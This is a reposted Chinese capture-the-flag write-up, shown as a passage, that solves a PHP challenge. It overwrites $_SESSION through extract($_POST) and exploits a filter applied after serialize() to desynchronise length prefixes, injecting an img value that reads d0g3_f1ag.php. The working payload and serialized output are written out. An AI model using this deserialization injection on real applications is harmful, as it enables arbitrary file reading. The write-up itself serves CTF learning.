source_code';}if(!$_GET['img_path']){ $_SESSION['img'] = base64_encode('guest_img.png');}else{ $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));}$serialize_info = filter(serialize($_SESSION));# 这里就是题目的名称 序列化了 并且用filter()函数进行了过滤if($function == 'highlight_file'){ highlight_file('index.php');}else if($function == 'phpinfo'){ eval('phpinfo();'); //maybe you can find something in here!}else if($function == 'show_image'){ $userinfo = unserialize($serialize_info); echo file_get_contents(base64_decode($userinfo['img'])); # 这里会输出userinfo['img']内容 大概我们要想办法使得这里的值为flag文件}
maybe you can find something in here!
访问 ?f=phpinfo 看看有什么好东西:d0g3_f1ag.php
也就是说,我们要让 `echo file_get_contents(base64_decode($userinfo['img']));` 输出 d0g3_f1ag.php 的内容。
直接传 img_path=d0g3_f1ag.php 是没有用的(?f=show_image&img_path=d0g3_f1ag.php):传入的 img_path 并不是原样存入 $_SESSION['img'],而是先 base64_encode 再 sha1,存下来的是 sha1 值而不是文件名的 base64。
// Serialize the whole session and pass the result through the challenge's filter()
// (defined elsewhere in this file). filter() runs on the already-serialized string,
// i.e. after every s:N length prefix has been written.
$serialize_info = filter(serialize($_SESSION));// Value of $serialize_info as reported in the writeup:
// a:3:{s:4:"user";s:5:"guest";s:8:"function";s:10:"show_image";s:3:"img";s:40:"6b9b4b868ded1eb152045ebd5ea11b5be979d3ae";}
目标:Session[img]=ZDBnM19mMWFnLnBocA==
ZDBnM19mMWFnLnBocA== 是 d0g3_f1ag.php 的 base64 编码
";extract($_POST);var_dump($_SESSION);?>
# 第一个 var_dump 的值
array(2) { ["user"]=> string(5) "guest" ["function"]=> NULL }
# 如果 $_POST 为 _SESSION[flag]=1,则其值变为
array(1) { ["flag"]=> int(1) }
也就是说,extract($_POST) 会把 POST 参数直接注册为变量,提交 _SESSION[...] 就能整个覆盖 $_SESSION 数组。
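// Session contents used in the writeup (quotes restored to plain ASCII so this parses as PHP;
// the serialized form below matches the one shown on the page).
//
// The 'phpflag' value is shaped so that, once filter() empties the key but leaves its declared
// length s:7 in place, the parser consumes `";s:48:` as the key and then reads the rest of this
// string as the remaining array members. Defensive takeaway: substring replacement on an
// already-serialized string silently desynchronizes the s:N length prefixes from the data.
$_SESSION['phpflag'] = ';s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}';
$_SESSION['img'] = base64_encode('guest_img.png');
// serialize($_SESSION) now yields:
// a:2:{s:7:"phpflag";s:48:";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}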
a:2:{s:7:"";s:48:";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
键名 phpflag 经 filter() 后变为空,但长度声明仍是 s:7,于是反序列化时键变为 ";s:48:,值为 1;img 值为 "ZDBnM19mMWFnLnBocA==";而后面的就被丢弃了:
array(2) { ["";s:48:"]=> string(1) "1" ["img"]=> string(20) "ZDBnM19mMWFnLnBocA==" }
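import base64
import hashlib

# Reproduces the server-side derivation of $_SESSION['img'] seen in the challenge source:
# the default image is stored as base64_encode('guest_img.png'), while a supplied img_path
# is stored as sha1(base64_encode(img_path)). Both values are computed here for any path.


def session_img_values(img_path: str) -> tuple[str, str]:
    """Return (base64 of ``img_path``, hex SHA-1 of that base64 text).

    Args:
        img_path: the image path exactly as the server would receive it.

    Returns:
        A pair ``(b64, sha1_hex)``; ``sha1_hex`` is 40 lowercase hex characters.
    """
    b64 = base64.b64encode(img_path.encode('utf-8')).decode('utf-8')
    # The server hashes the *base64 text*, not the raw path, so hash the encoded form.
    sha1_hex = hashlib.sha1(b64.encode('utf-8')).hexdigest()
    return b64, sha1_hex


before = 'guest_img.png'
bs64, sha1 = session_img_values(before)
print(bs64)
print(sha1)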
转载地址:http://tywmf.baihongyu.com/